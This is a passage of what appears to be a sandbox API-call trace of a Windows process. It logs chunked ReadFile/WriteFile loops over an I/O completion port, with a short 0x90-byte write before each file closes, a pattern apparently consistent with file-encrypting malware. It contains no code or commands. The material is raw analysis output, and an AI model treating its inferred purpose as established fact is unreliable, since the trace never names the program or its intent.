WriteFile (in: hFile=0x194, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0149.269] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.269] ReadFile (in: hFile=0x194, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0149.331] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.333] WriteFile (in: hFile=0x194, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0149.335] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.336] WriteFile (in: hFile=0x194, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0149.336] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0149.336] CloseHandle (hObject=0x194) returned 1 [0150.272] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0150.275] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.523] ReadFile (in: hFile=0x1b8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0155.551] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.551] WriteFile (in: hFile=0x1b8, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.552] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.552] ReadFile (in: hFile=0x1b8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0155.552] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.552] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.552] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.552] WriteFile (in: hFile=0x1b8, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.552] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.552] CloseHandle (hObject=0x1b8) returned 1 [0155.553] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0155.557] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.694] ReadFile (in: hFile=0x1a8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0155.694] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.694] ReadFile (in: hFile=0x1cc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 1 [0155.694] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.694] WriteFile (in: hFile=0x1a8, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.694] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.694] WriteFile (in: hFile=0x1cc, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.695] ReadFile (in: hFile=0x1a8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.695] ReadFile (in: hFile=0x1cc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.695] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.695] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.695] WriteFile (in: hFile=0x1a8, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.695] WriteFile (in: hFile=0x1cc, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0155.695] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.695] CloseHandle (hObject=0x1a8) returned 1 [0155.704] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0155.706] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.706] CloseHandle (hObject=0x1cc) returned 1 [0155.715] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0155.718] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.962] ReadFile (in: hFile=0x1a8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 1 [0155.962] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.962] ReadFile (in: hFile=0x19c, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 1 [0155.962] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.962] ReadFile (in: hFile=0x1d8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x35a0020) returned 1 [0155.963] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.963] ReadFile (in: hFile=0x1e0, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x36c0020) returned 1 [0155.963] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.963] ReadFile (in: hFile=0x1c8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x37e0020) returned 1 [0155.964] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.964] ReadFile (in: hFile=0x1a0, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3900020) returned 1 [0155.964] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.964] WriteFile (in: hFile=0x1a8, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x38dc, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.965] WriteFile (in: hFile=0x19c, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0xca7c, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0155.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.965] WriteFile (in: hFile=0x1d8, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0x3b9b, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x35a0020) returned 1 [0155.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.966] WriteFile (in: hFile=0x1e0, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x1098d, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020) returned 1 [0155.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.966] WriteFile (in: hFile=0x1c8, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x18f9a, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x37e0020) returned 1 [0155.967] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.967] WriteFile (in: hFile=0x1a0, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0x1234d, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020) returned 1 [0155.967] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.967] ReadFile (in: hFile=0x1a8, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0155.967] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.967] ReadFile (in: hFile=0x19c, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3480020) returned 0x0 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.968] ReadFile (in: hFile=0x1d8, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.968] ReadFile (in: hFile=0x1e0, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.968] ReadFile (in: hFile=0x1c8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.968] ReadFile (in: hFile=0x1a0, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3900020) returned 0x0 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.968] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.968] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0155.968] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.969] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.969] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.969] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0155.969] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.969] WriteFile (in: hFile=0x1a8, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x2690020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.969] WriteFile (in: hFile=0x19c, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0155.969] WriteFile (in: hFile=0x1d8, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x35a0020) returned 1 [0155.969] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, 